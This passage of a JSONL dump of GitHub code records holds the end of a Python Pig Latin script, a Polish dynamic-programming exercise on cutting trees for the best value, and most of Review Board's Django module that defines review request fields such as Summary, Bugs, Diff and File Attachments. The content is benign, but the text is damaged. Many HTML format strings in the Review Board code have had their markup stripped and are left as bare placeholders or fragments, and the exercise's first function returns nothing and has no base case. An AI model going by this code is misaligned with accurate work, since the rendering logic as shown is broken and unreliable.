as input and convert it to PigLatin\n'''\nvowels = \"aeiouAEIOU\"\nwhile(True):\n inputString = input(\"Please enter an English word to be translated into PigLatin(You can enter . to exit) : \")\n if(inputString == \".\"): #exit the program if uses inputs period\n break\n elif(inputString[0] in vowels):\n modifiedString = inputString+\"yay\" #if input string starts with a vowel\n else:\n for vowel in vowels:\n i = inputString.find(vowel)\n if(i >= 0):\n break\n if(i>=0):\n modifiedString = inputString[i::]+inputString[0:i]+\"ay\" #if a vowel is found\n else:\n modifiedString = inputString+\"ay\" #if no vowels are found\n print(inputString , \"in PigLatin is : \",modifiedString)\n","repo_name":"DeekshaZ/Python-Assignments","sub_path":"PalindromeAndPigLatin/pigLatin.py","file_name":"pigLatin.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74926993378","text":"#Wycinka lasu\n\ndef fun(T, n):\n max(T[n] + fun(T, n-2), T[n-1] + fun(T,n-3))\n\ndef las(T,n):\n if n < 0:\n return 0 \n return max(las(T,n-2)+T[n],las(T,n-1))\n\ndef las_iteracyjnie(T):\n pom = [0 for i in range(len(T))]\n for i in range(len(T)):\n if i > 2:\n pom[i] = T[i] + max(pom[i-2],pom[i-3])\n else:\n pom[i] = T[i]\n return max(pom[len(T)-1],pom[len(T)-2])\n\nprint(las_iteracyjnie([5,1,2,7,4,2]))","repo_name":"Kasl0/ASD","sub_path":"SEKCJA II/cwiczenia 2/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4592261195","text":"from __future__ import annotations\n\nimport logging\nimport uuid\nfrom itertools import chain\nfrom typing import Any, Dict\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.template.loader import get_template, render_to_string\nfrom django.urls import NoReverseMatch\nfrom django.utils.functional import cached_property\nfrom django.utils.html import escape, format_html, format_html_join\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import gettext_lazy as _\n\nfrom reviewboard.attachments.models import FileAttachment\nfrom reviewboard.diffviewer.diffutils import get_sorted_filediffs\nfrom reviewboard.diffviewer.models import DiffCommit, DiffSet\nfrom reviewboard.reviews.fields import (BaseCommaEditableField,\n BaseEditableField,\n BaseReviewRequestField,\n BaseReviewRequestFieldSet,\n BaseTextAreaField)\nfrom reviewboard.reviews.models import (Group, ReviewRequest,\n ReviewRequestDraft,\n Screenshot)\nfrom reviewboard.scmtools.models import Repository\nfrom reviewboard.site.urlresolvers import local_site_reverse\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass BuiltinFieldMixin(object):\n \"\"\"Mixin for built-in fields.\n\n This overrides some functions to work with native fields on a\n ReviewRequest or ReviewRequestDraft, rather than working with those\n stored in extra_data.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the field.\n\n Args:\n *args (tuple):\n Positional arguments to pass through to the superclass.\n\n **kwargs (dict):\n Keyword arguments to pass through to the superclass.\n \"\"\"\n super(BuiltinFieldMixin, self).__init__(*args, **kwargs)\n\n if (not hasattr(self.review_request_details, self.field_id) and\n isinstance(self.review_request_details, ReviewRequestDraft)):\n # This field only exists in ReviewRequest, and not in\n # the draft, so we're going to work there instead.\n self.review_request_details = \\\n self.review_request_details.get_review_request()\n\n def load_value(self, review_request_details):\n \"\"\"Load a value from the review request or draft.\n\n Args:\n review_request_details (reviewboard.reviews.models.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request or draft.\n\n Returns:\n object:\n The loaded value.\n \"\"\"\n value = getattr(review_request_details, self.field_id)\n\n if isinstance(value, models.Manager):\n value = list(value.all())\n\n return value\n\n def save_value(self, value):\n \"\"\"Save the value in the review request or draft.\n\n Args:\n value (object):\n The new value for the field.\n \"\"\"\n field = getattr(self.review_request_details, self.field_id)\n\n # ManyRelatedManager cannot be set with a simple assignment, so we need\n # to use .set() for that. Other field types can use setattr.\n if isinstance(field, models.Manager):\n field.set(value)\n else:\n setattr(self.review_request_details, self.field_id, value)\n\n\nclass BuiltinTextAreaFieldMixin(BuiltinFieldMixin):\n \"\"\"Mixin for built-in text area fields.\n\n This will ensure that the text is always rendered in Markdown,\n no matter whether the source text is plain or Markdown. It will\n still escape the text if it's not in Markdown format before\n rendering.\n \"\"\"\n\n def get_data_attributes(self):\n \"\"\"Return any data attributes to include in the element.\n\n Returns:\n dict:\n The data attributes to include in the element.\n \"\"\"\n attrs = super(BuiltinTextAreaFieldMixin, self).get_data_attributes()\n\n # This is already available in the review request state fed to the\n # page, so we don't need it in the data attributes as well.\n attrs.pop('raw-value', None)\n\n return attrs\n\n\nclass ReviewRequestPageDataMixin(object):\n \"\"\"Mixin for internal fields needing access to the page data.\n\n These are used by fields that operate on state generated when creating the\n review request page. The view handling that page makes a lot of queries,\n and stores the results. This mixin allows access to those results,\n preventing additional queries.\n\n The data structure is not meant to be public API, and this mixin should not\n be used by any classes outside this file.\n\n By default, this will not render or handle any value loading or change\n entry recording. Subclasses must implement those manually.\n \"\"\"\n\n #: Whether the field should be rendered.\n should_render = False\n\n def __init__(self, review_request_details, data=None, *args, **kwargs):\n \"\"\"Initialize the mixin.\n\n Args:\n review_request_details (reviewboard.reviews.models.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request (or the active draft thereof). In practice\n this will either be a\n :py:class:`reviewboard.reviews.models.ReviewRequest` or a\n :py:class:`reviewboard.reviews.models.ReviewRequestDraft`.\n\n data (reviewboard.reviews.detail.ReviewRequestPageData):\n The data already queried for the review request page.\n\n *args (tuple):\n Additional positional arguments.\n\n **kwargs (dict):\n Additional keyword arguments.\n \"\"\"\n super(ReviewRequestPageDataMixin, self).__init__(\n review_request_details, *args, **kwargs)\n\n self.data = data\n\n def load_value(self, review_request_details):\n \"\"\"Load a value from the review request or draft.\n\n Args:\n review_request_details (reviewboard.reviews.models.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request or draft.\n\n Returns:\n object:\n The loaded value.\n \"\"\"\n return None\n\n def record_change_entry(self, changedesc, old_value, new_value):\n \"\"\"Record information on the changed values in a ChangeDescription.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description to record the entry in.\n\n old_value (object):\n The old value of the field.\n\n new_value (object):\n The new value of the field.\n \"\"\"\n pass\n\n\nclass BaseCaptionsField(ReviewRequestPageDataMixin, BaseReviewRequestField):\n \"\"\"Base class for rendering captions for attachments.\n\n This serves as a base for FileAttachmentCaptionsField and\n ScreenshotCaptionsField. It provides the base rendering and\n for caption changes on file attachments or screenshots.\n \"\"\"\n\n obj_map_attr = None\n caption_object_field = None\n\n change_entry_renders_inline = False\n\n def render_change_entry_html(self, info):\n \"\"\"Render a change entry to HTML.\n\n This function is expected to return safe, valid HTML. Any values\n coming from a field or any other form of user input must be\n properly escaped.\n\n Args:\n info (dict):\n A dictionary describing how the field has changed. This is\n guaranteed to have ``new`` and ``old`` keys, but may also\n contain ``added`` and ``removed`` keys as well.\n\n Returns:\n unicode:\n The HTML representation of the change entry.\n \"\"\"\n render_item = super(BaseCaptionsField, self).render_change_entry_html\n obj_map = getattr(self.data, self.obj_map_attr)\n\n s = ['']\n\n for id_str, caption in info.items():\n obj = obj_map[int(id_str)]\n\n s.append(format_html(\n ''\n ' '\n ' '\n '',\n url=obj.get_absolute_url(),\n filename=obj.filename,\n caption=mark_safe(render_item(caption))))\n\n s.append('
    {filename}:{caption}
    ')\n\n return ''.join(s)\n\n def serialize_change_entry(self, changedesc):\n \"\"\"Serialize a change entry for public consumption.\n\n This will output a version of the change entry for use in the API.\n It can be the same content stored in the\n :py:class:`~reviewboard.changedescs.models.ChangeDescription`, but\n does not need to be.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description whose field is to be serialized.\n\n Returns:\n list:\n An appropriate serialization for the field.\n \"\"\"\n data = changedesc.fields_changed[self.field_id]\n\n return [\n {\n 'old': data[str(obj.pk)]['old'][0],\n 'new': data[str(obj.pk)]['new'][0],\n self.caption_object_field: obj,\n }\n for obj in self.model.objects.filter(pk__in=data.keys())\n ]\n\n\nclass BaseModelListEditableField(BaseCommaEditableField):\n \"\"\"Base class for editable comma-separated list of model instances.\n\n This is used for built-in classes that work with ManyToManyFields.\n \"\"\"\n\n model_name_attr = None\n\n def has_value_changed(self, old_value, new_value):\n \"\"\"Return whether the value has changed.\n\n Args:\n old_value (object):\n The old value of the field.\n\n new_value (object):\n The new value of the field.\n\n Returns:\n bool:\n Whether the value of the field has changed.\n \"\"\"\n old_values = set([obj.pk for obj in old_value])\n new_values = set([obj.pk for obj in new_value])\n\n return old_values.symmetric_difference(new_values)\n\n def record_change_entry(self, changedesc, old_value, new_value):\n \"\"\"Record information on the changed values in a ChangeDescription.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description to record the entry in.\n\n old_value (object):\n The old value of the field.\n\n new_value (object):\n The new value of the field.\n \"\"\"\n changedesc.record_field_change(self.field_id, old_value, new_value,\n self.model_name_attr)\n\n def render_change_entry_item_html(self, info, item):\n \"\"\"Render an item for change description HTML.\n\n Args:\n info (dict):\n A dictionary describing how the field has changed.\n\n item (object):\n The value of the item.\n\n Returns:\n unicode:\n The rendered change entry.\n \"\"\"\n label, url, pk = item\n\n if url:\n return '%s' % (escape(url), escape(label))\n else:\n return escape(label)\n\n def save_value(self, value):\n \"\"\"Save the value in the review request or draft.\n\n Args:\n value (object):\n The new value for the field.\n \"\"\"\n setattr(self, self.field_id, value)\n\n\nclass StatusField(BuiltinFieldMixin, BaseReviewRequestField):\n \"\"\"The Status field on a review request.\"\"\"\n\n field_id = 'status'\n label = _('Status')\n is_required = True\n\n #: Whether the field should be rendered.\n should_render = False\n\n def get_change_entry_sections_html(self, info):\n \"\"\"Return sections of change entries with titles and rendered HTML.\n\n Because the status field is specially handled, this just returns an\n empty list.\n \"\"\"\n return []\n\n\nclass SummaryField(BuiltinFieldMixin, BaseEditableField):\n \"\"\"The Summary field on a review request.\"\"\"\n\n field_id = 'summary'\n label = _('Summary')\n is_required = True\n tag_name = 'h1'\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.SummaryFieldView'\n\n\nclass DescriptionField(BuiltinTextAreaFieldMixin, BaseTextAreaField):\n \"\"\"The Description field on a review request.\"\"\"\n\n field_id = 'description'\n label = _('Description')\n is_required = True\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.DescriptionFieldView'\n\n def is_text_markdown(self, value):\n \"\"\"Return whether the description uses Markdown.\n\n Returns:\n bool:\n True if the description field should be formatted using Markdown.\n \"\"\"\n return self.review_request_details.description_rich_text\n\n\nclass TestingDoneField(BuiltinTextAreaFieldMixin, BaseTextAreaField):\n \"\"\"The Testing Done field on a review request.\"\"\"\n\n field_id = 'testing_done'\n label = _('Testing Done')\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.TestingDoneFieldView'\n\n def is_text_markdown(self, value):\n \"\"\"Return whether the description uses Markdown.\n\n Returns:\n bool:\n True if the description field should be formatted using Markdown.\n \"\"\"\n return self.review_request_details.testing_done_rich_text\n\n\nclass OwnerField(BuiltinFieldMixin, BaseEditableField):\n \"\"\"The Owner field on a review request.\"\"\"\n\n field_id = 'submitter'\n label = _('Owner')\n model = User\n model_name_attr = 'username'\n is_required = True\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.OwnerFieldView'\n\n def render_value(self, user):\n \"\"\"Render the value in the field.\n\n Args:\n user (django.contrib.auth.models.User):\n The value to render.\n\n Returns:\n unicode:\n The rendered value.\n \"\"\"\n return format_html(\n '{1}',\n local_site_reverse(\n 'user',\n local_site=self.review_request_details.local_site,\n args=[user]),\n user.get_profile().get_display_name(self.request.user))\n\n def record_change_entry(self, changedesc, old_value, new_value):\n \"\"\"Record information on the changed values in a ChangeDescription.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description to record the entry in.\n\n old_value (object):\n The old value of the field.\n\n new_value (object):\n The new value of the field.\n \"\"\"\n changedesc.record_field_change(self.field_id, old_value, new_value,\n self.model_name_attr)\n\n def render_change_entry_value_html(self, info, item):\n \"\"\"Render the value for a change description string to HTML.\n\n Args:\n info (dict):\n A dictionary describing how the field has changed.\n\n item (object):\n The value of the field.\n\n Returns:\n unicode:\n The rendered change entry.\n \"\"\"\n label, url, pk = item\n\n if url:\n return '%s' % (escape(url), escape(label))\n else:\n return escape(label)\n\n def serialize_change_entry(self, changedesc):\n \"\"\"Serialize a change entry for public consumption.\n\n This will output a version of the change entry for use in the API.\n It can be the same content stored in the\n :py:class:`~reviewboard.changedescs.models.ChangeDescription`, but\n does not need to be.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description whose field is to be serialized.\n\n Returns:\n dict:\n An appropriate serialization for the field.\n \"\"\"\n entry = super(OwnerField, self).serialize_change_entry(changedesc)\n\n return {\n key: value[0]\n for key, value in entry.items()\n }\n\n\nclass RepositoryField(BuiltinFieldMixin, BaseReviewRequestField):\n \"\"\"The Repository field on a review request.\"\"\"\n\n field_id = 'repository'\n label = _('Repository')\n model = Repository\n\n @property\n def should_render(self):\n \"\"\"Whether the field should be rendered.\"\"\"\n review_request = self.review_request_details.get_review_request()\n\n return review_request.repository_id is not None\n\n\nclass BranchField(BuiltinFieldMixin, BaseEditableField):\n \"\"\"The Branch field on a review request.\"\"\"\n\n field_id = 'branch'\n label = _('Branch')\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.BranchFieldView'\n\n\nclass BugsField(BuiltinFieldMixin, BaseCommaEditableField):\n \"\"\"The Bugs field on a review request.\"\"\"\n\n field_id = 'bugs_closed'\n label = _('Bugs')\n\n one_line_per_change_entry = False\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.BugsFieldView'\n\n def load_value(self, review_request_details):\n \"\"\"Load a value from the review request or draft.\n\n Args:\n review_request_details (reviewboard.reviews.models.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request or draft.\n\n Returns:\n object:\n The loaded value.\n \"\"\"\n return review_request_details.get_bug_list()\n\n def save_value(self, value):\n \"\"\"Save the value in the review request or draft.\n\n Args:\n value (object):\n The new value for the field.\n \"\"\"\n serialized_value = ', '.join(value)\n serialized_value = serialized_value.replace('\\n', '').replace('\\r', '')\n setattr(self.review_request_details, self.field_id, serialized_value)\n\n def render_item(self, bug_id):\n \"\"\"Render an item from the list.\n\n Args:\n item (object):\n The item to render.\n\n Returns:\n unicode:\n The rendered item.\n \"\"\"\n bug_url = self._get_bug_url(bug_id)\n\n if bug_url:\n return format_html('{id}',\n url=bug_url, id=bug_id)\n else:\n return escape(bug_id)\n\n def render_change_entry_item_html(self, info, item):\n \"\"\"Render an item for change description HTML.\n\n Args:\n info (dict):\n A dictionary describing how the field has changed.\n\n item (object):\n The value of the item.\n\n Returns:\n unicode:\n The rendered change entry.\n \"\"\"\n return self.render_item(item[0])\n\n def _get_bug_url(self, bug_id):\n \"\"\"Return the URL to link to a specific bug.\n\n Args:\n bug_id (unicode):\n The ID of the bug to link to.\n\n Returns:\n unicode:\n The link to view the bug in the bug tracker, if available.\n \"\"\"\n review_request = self.review_request_details.get_review_request()\n repository = self.review_request_details.repository\n local_site_name = None\n bug_url = None\n\n if review_request.local_site:\n local_site_name = review_request.local_site.name\n\n try:\n if (repository and\n repository.bug_tracker and\n '%s' in repository.bug_tracker):\n bug_url = local_site_reverse(\n 'bug_url', local_site_name=local_site_name,\n args=[review_request.display_id, bug_id])\n except NoReverseMatch:\n pass\n\n return bug_url\n\n\nclass DependsOnField(BuiltinFieldMixin, BaseModelListEditableField):\n \"\"\"The Depends On field on a review request.\"\"\"\n\n field_id = 'depends_on'\n label = _('Depends On')\n model = ReviewRequest\n model_name_attr = 'summary'\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.DependsOnFieldView'\n\n def render_change_entry_item_html(self, info, item):\n \"\"\"Render an item for change description HTML.\n\n Args:\n info (dict):\n A dictionary describing how the field has changed.\n\n item (object):\n The value of the item.\n\n Returns:\n unicode:\n The rendered change entry.\n \"\"\"\n item = ReviewRequest.objects.get(pk=item[2])\n\n rendered_item = format_html(\n '{id} - {summary}',\n url=item.get_absolute_url(),\n id=item.pk,\n summary=item.summary)\n\n if item.status in (ReviewRequest.SUBMITTED,\n ReviewRequest.DISCARDED):\n return '%s' % rendered_item\n else:\n return rendered_item\n\n def render_item(self, item):\n \"\"\"Render an item from the list.\n\n Args:\n item (object):\n The item to render.\n\n Returns:\n unicode:\n The rendered item.\n \"\"\"\n rendered_item = format_html(\n '{id}',\n url=item.get_absolute_url(),\n summary=item.summary,\n id=item.display_id)\n\n if item.status in (ReviewRequest.SUBMITTED,\n ReviewRequest.DISCARDED):\n return '%s' % rendered_item\n else:\n return rendered_item\n\n\nclass BlocksField(BuiltinFieldMixin, BaseReviewRequestField):\n \"\"\"The Blocks field on a review request.\"\"\"\n\n field_id = 'blocks'\n label = _('Blocks')\n model = ReviewRequest\n\n def load_value(self, review_request_details):\n \"\"\"Load a value from the review request or draft.\n\n Args:\n review_request_details (reviewboard.reviews.models.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request or draft.\n\n Returns:\n object:\n The loaded value.\n \"\"\"\n return review_request_details.get_review_request().get_blocks()\n\n @property\n def should_render(self):\n \"\"\"Whether the field should be rendered.\"\"\"\n return len(self.value) > 0\n\n def render_value(self, blocks):\n \"\"\"Render the value in the field.\n\n Args:\n blocks (list):\n The value to render.\n\n Returns:\n unicode:\n The rendered value.\n \"\"\"\n return format_html_join(\n ', ',\n '{1}',\n [\n (item.get_absolute_url(), item.display_id)\n for item in blocks\n ])\n\n\nclass ChangeField(BuiltinFieldMixin, BaseReviewRequestField):\n \"\"\"The Change field on a review request.\n\n This is shown for repositories supporting changesets. The change\n number is similar to a commit ID, with the exception that it's only\n ever stored on the ReviewRequest and never changes.\n\n If both ``changenum`` and ``commit_id`` are provided on the review\n request, only this field will be shown, as both are likely to have\n values.\n \"\"\"\n\n field_id = 'changenum'\n label = _('Change')\n\n def load_value(self, review_request_details):\n \"\"\"Load a value from the review request or draft.\n\n Args:\n review_request_details (reviewboard.reviews.models.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request or draft.\n\n Returns:\n object:\n The loaded value.\n \"\"\"\n return review_request_details.get_review_request().changenum\n\n @property\n def should_render(self):\n \"\"\"Whether the field should be rendered.\"\"\"\n return bool(self.value)\n\n def render_value(self, changenum):\n \"\"\"Render the value in the field.\n\n Args:\n changenum (unicode):\n The value to render.\n\n Returns:\n unicode:\n The rendered value.\n \"\"\"\n review_request = self.review_request_details.get_review_request()\n\n is_pending, changenum = review_request.changeset_is_pending(changenum)\n\n if is_pending:\n return escape(_('%s (pending)') % changenum)\n else:\n return changenum\n\n\nclass CommitField(BuiltinFieldMixin, BaseReviewRequestField):\n \"\"\"The Commit field on a review request.\n\n This displays the ID of the commit the review request is representing.\n\n Since the ``commit_id`` and ``changenum`` fields are both populated, we\n let ChangeField take precedence. It knows how to render information based\n on a changeset ID.\n \"\"\"\n\n field_id = 'commit_id'\n label = _('Commit')\n can_record_change_entry = True\n tag_name = 'span'\n\n @property\n def should_render(self):\n \"\"\"Whether the field should be rendered.\"\"\"\n return (bool(self.value) and\n not self.review_request_details.get_review_request().changenum)\n\n def render_value(self, commit_id):\n \"\"\"Render the value in the field.\n\n Args:\n commit_id (unicode):\n The value to render.\n\n Returns:\n unicode:\n The rendered value.\n \"\"\"\n # Abbreviate SHA-1s\n if len(commit_id) == 40:\n abbrev_commit_id = commit_id[:7] + '...'\n\n return '%s' % (escape(commit_id),\n escape(abbrev_commit_id))\n else:\n return escape(commit_id)\n\n\nclass DiffField(ReviewRequestPageDataMixin, BuiltinFieldMixin,\n BaseReviewRequestField):\n \"\"\"Represents a newly uploaded diff on a review request.\n\n This is not shown as an actual displayable field on the review request\n itself. Instead, it is used only during the ChangeDescription population\n and processing steps.\n \"\"\"\n\n field_id = 'diff'\n label = _('Diff')\n\n can_record_change_entry = True\n\n MAX_FILES_PREVIEW = 8\n\n def render_change_entry_html(self, info):\n \"\"\"Render a change entry to HTML.\n\n This function is expected to return safe, valid HTML. Any values\n coming from a field or any other form of user input must be\n properly escaped.\n\n Args:\n info (dict):\n A dictionary describing how the field has changed. This is\n guaranteed to have ``new`` and ``old`` keys, but may also\n contain ``added`` and ``removed`` keys as well.\n\n Returns:\n unicode:\n The HTML representation of the change entry.\n \"\"\"\n added_diff_info = info['added'][0]\n review_request = self.review_request_details.get_review_request()\n\n try:\n diffset = self.data.diffsets_by_id[added_diff_info[2]]\n except KeyError:\n # If a published revision of a diff has been deleted from the\n # database, this will explode. Just return a blank string for this,\n # so that it doesn't show a traceback.\n return ''\n\n diff_revision = diffset.revision\n past_revision = diff_revision - 1\n diff_url = added_diff_info[1]\n\n s = []\n\n # Fetch the total number of inserts/deletes. These will be shown\n # alongside the diff revision.\n counts = diffset.get_total_line_counts()\n raw_insert_count = counts.get('raw_insert_count', 0)\n raw_delete_count = counts.get('raw_delete_count', 0)\n\n line_counts = []\n\n if raw_insert_count > 0:\n line_counts.append('+%d'\n % raw_insert_count)\n\n if raw_delete_count > 0:\n line_counts.append('-%d'\n % raw_delete_count)\n\n # Display the label, URL, and line counts for the diff.\n s.append(format_html(\n '

    '\n ' {label}'\n ' ({line_counts})'\n '

    ',\n url=diff_url,\n label=_('Revision %s') % diff_revision,\n count=_('%d files') % len(diffset.cumulative_files),\n line_counts=mark_safe(' '.join(line_counts))))\n\n if past_revision > 0:\n # This is not the first diff revision. Include an interdiff link.\n interdiff_url = local_site_reverse(\n 'view-interdiff',\n local_site=review_request.local_site,\n args=[\n review_request.display_id,\n past_revision,\n diff_revision,\n ])\n\n s.append(format_html(\n '

    {text}',\n url=interdiff_url,\n text=_('Show changes')))\n\n file_count = len(diffset.cumulative_files)\n\n if file_count > 0:\n # Begin displaying the list of files modified in this diff.\n # It will be capped at a fixed number (MAX_FILES_PREVIEW).\n s += [\n '

    ',\n ' ',\n ]\n\n # We want a sorted list of filediffs, but tagged with the order in\n # which they come from the database, so that we can properly link\n # to the respective files in the diff viewer.\n files = get_sorted_filediffs(enumerate(diffset.cumulative_files),\n key=lambda i: i[1])\n\n for i, filediff in files[:self.MAX_FILES_PREVIEW]:\n counts = filediff.get_line_counts()\n\n data_attrs = [\n 'data-%s=\"%s\"' % (attr.replace('_', '-'), counts[attr])\n for attr in ('insert_count', 'delete_count',\n 'replace_count', 'total_line_count')\n if counts.get(attr) is not None\n ]\n\n s.append(format_html(\n ''\n ' '\n ' '\n '',\n data_attrs=mark_safe(' '.join(data_attrs)),\n url=diff_url + '#%d' % i,\n filename=filediff.source_file))\n\n num_remaining = file_count - self.MAX_FILES_PREVIEW\n\n if num_remaining > 0:\n # There are more files remaining than we've shown, so show\n # the count.\n s.append(format_html(\n ''\n ' '\n ' '\n '',\n text=_('%s more') % num_remaining))\n\n s += [\n '
    '\n ' {filename}'\n '
    {text}
    ',\n '
    ',\n ]\n\n return ''.join(s)\n\n def has_value_changed(self, old_value, new_value):\n \"\"\"Return whether the value has changed.\n\n Args:\n old_value (object):\n The old value of the field.\n\n new_value (object):\n The new value of the field.\n\n Returns:\n bool:\n Whether the value of the field has changed.\n \"\"\"\n # If there's a new diffset at all (in new_value), then it passes\n # the test.\n return new_value is not None\n\n def load_value(self, review_request_details):\n \"\"\"Load a value from the review request or draft.\n\n Args:\n review_request_details (reviewboard.reviews.models.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request or draft.\n\n Returns:\n object:\n The loaded value.\n \"\"\"\n # This will be None for a ReviewRequest, and may have a value for\n # ReviewRequestDraft if a new diff was attached.\n return getattr(review_request_details, 'diffset', None)\n\n def save_value(self, value):\n \"\"\"Save the value in the review request or draft.\n\n Args:\n value (object):\n The new value for the field.\n \"\"\"\n # The diff is a fake field that doesn't actually exist on the review\n # request, so it deosn't make sense to save.\n pass\n\n def record_change_entry(self, changedesc, unused, diffset):\n \"\"\"Record information on the changed values in a ChangeDescription.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description to record the entry in.\n\n old_value (object):\n The old value of the field.\n\n new_value (object):\n The new value of the field.\n \"\"\"\n review_request = self.review_request_details.get_review_request()\n\n url = local_site_reverse(\n 'view-diff-revision',\n local_site=review_request.local_site,\n args=[review_request.display_id, diffset.revision])\n\n changedesc.fields_changed['diff'] = {\n 'added': [(\n _('Diff r%s') % diffset.revision,\n url,\n diffset.pk\n )]\n }\n\n def serialize_change_entry(self, changedesc):\n \"\"\"Serialize a change entry for public consumption.\n\n This will output a version of the change entry for use in the API.\n It can be the same content stored in the\n :py:class:`~reviewboard.changedescs.models.ChangeDescription`, but\n does not need to be.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description whose field is to be serialized.\n\n Returns:\n dict:\n An appropriate serialization for the field.\n \"\"\"\n diffset_id = changedesc.fields_changed['diff']['added'][0][2]\n\n return {\n 'added': DiffSet.objects.get(pk=diffset_id),\n }\n\n\nclass FileAttachmentCaptionsField(BaseCaptionsField):\n \"\"\"Renders caption changes for file attachments.\n\n This is not shown as an actual displayable field on the review request\n itself. Instead, it is used only during the ChangeDescription rendering\n stage. It is not, however, used for populating entries in\n ChangeDescription.\n \"\"\"\n\n field_id = 'file_captions'\n label = _('File Captions')\n obj_map_attr = 'file_attachments_by_id'\n model = FileAttachment\n caption_object_field = 'file_attachment'\n\n\nclass FileAttachmentsField(ReviewRequestPageDataMixin, BuiltinFieldMixin,\n BaseCommaEditableField):\n \"\"\"Renders removed or added file attachments.\n\n This is not shown as an actual displayable field on the review request\n itself. Instead, it is used only during the ChangeDescription rendering\n stage. It is not, however, used for populating entries in\n ChangeDescription.\n \"\"\"\n\n field_id = 'files'\n label = _('Files')\n model = FileAttachment\n\n thumbnail_template = 'reviews/changedesc_file_attachment.html'\n\n def get_change_entry_sections_html(self, info):\n \"\"\"Return sections of change entries with titles and rendered HTML.\n\n Args:\n info (dict):\n A dictionary describing how the field has changed. This is\n guaranteed to have ``new`` and ``old`` keys, but may also\n contain ``added`` and ``removed`` keys as well.\n\n Returns:\n list of dict:\n A list of the change entry sections.\n \"\"\"\n sections = []\n\n if 'removed' in info:\n sections.append({\n 'title': _('Removed Files'),\n 'rendered_html': mark_safe(\n self.render_change_entry_html(info['removed'])),\n })\n\n if 'added' in info:\n sections.append({\n 'title': _('Added Files'),\n 'rendered_html': mark_safe(\n self.render_change_entry_html(info['added'])),\n })\n\n return sections\n\n def render_change_entry_html(self, values):\n \"\"\"Render a change entry to HTML.\n\n This function is expected to return safe, valid HTML. Any values\n coming from a field or any other form of user input must be\n properly escaped.\n\n Args:\n info (list):\n A list of the changed file attachments. Each item is a 3-tuple\n containing the ``caption``, ``filename``, and the ``pk`` of the\n file attachment in the database.\n\n Returns:\n django.utils.safestring.SafeText:\n The HTML representation of the change entry.\n \"\"\"\n # Fetch the template ourselves only once and render it for each item,\n # instead of calling render_to_string() in the loop, so we don't\n # have to locate and parse/fetch from cache for every item.\n\n template = get_template(self.thumbnail_template)\n items = []\n\n for caption, filename, pk in values:\n if pk in self.data.file_attachments_by_id:\n attachment = self.data.file_attachments_by_id[pk]\n else:\n try:\n attachment = FileAttachment.objects.get(pk=pk)\n except FileAttachment.DoesNotExist:\n continue\n\n items.append(template.render({\n 'model_attrs': self.get_attachment_js_model_attrs(attachment),\n 'uuid': uuid.uuid4(),\n }))\n\n return mark_safe(''.join(items))\n\n def get_attachment_js_model_attrs(\n self,\n attachment: FileAttachment,\n draft: bool = False,\n ) -> Dict[str, Any]:\n \"\"\"Return attributes for the RB.FileAttachment JavaScript model.\n\n This will determine the right attributes to pass to an instance\n of :js:class:`RB.FileAttachment`, based on the provided file\n attachment.\n\n Args:\n attachment (reviewboard.attachments.models.FileAttachment):\n The file attachment to return attributes for.\n\n draft (bool, optional):\n Whether to return attributes for a draft version of the\n file attachment.\n\n Returns:\n dict:\n The resulting model attributes.\n \"\"\"\n review_request = self.review_request_details.get_review_request()\n\n model_attrs = {\n 'downloadURL': attachment.get_absolute_url(),\n 'filename': attachment.filename,\n 'id': attachment.pk,\n 'loaded': True,\n 'publishedCaption': attachment.caption,\n 'revision': attachment.attachment_revision,\n 'state': self.review_request_details.get_file_attachment_state(\n attachment).value,\n 'thumbnailHTML': attachment.thumbnail,\n }\n\n if draft:\n caption = attachment.draft_caption\n else:\n caption = attachment.caption\n\n model_attrs['caption'] = caption\n\n if attachment.attachment_history_id:\n model_attrs['attachmentHistoryID'] = \\\n attachment.attachment_history_id\n\n if self._has_usable_review_ui(review_request, attachment):\n model_attrs['reviewURL'] = local_site_reverse(\n 'file-attachment',\n kwargs={\n 'file_attachment_id': attachment.pk,\n 'review_request_id': review_request.display_id,\n },\n request=self.request)\n\n return model_attrs\n\n def _has_usable_review_ui(self, review_request, file_attachment):\n \"\"\"Return whether there's a usable review UI for a file attachment.\n\n This will check that a review UI exists for the file attachment and\n that it's enabled for the provided user and review request.\n\n Args:\n review_request (reviewboard.reviews.models.review_request.\n ReviewRequest):\n The review request that the file attachment is on.\n\n file_attachment (reviewboard.attachments.models.FileAttachment):\n The file attachment that review UI would review.\n\n Returns:\n bool:\n ``True`` if a review UI exists and is usable. ``False`` if the\n review UI does not exist, cannot be used, or there's an error when\n checking.\n \"\"\"\n review_ui = file_attachment.review_ui\n\n try:\n return (\n review_ui and\n review_ui.is_enabled_for(user=self.request.user,\n 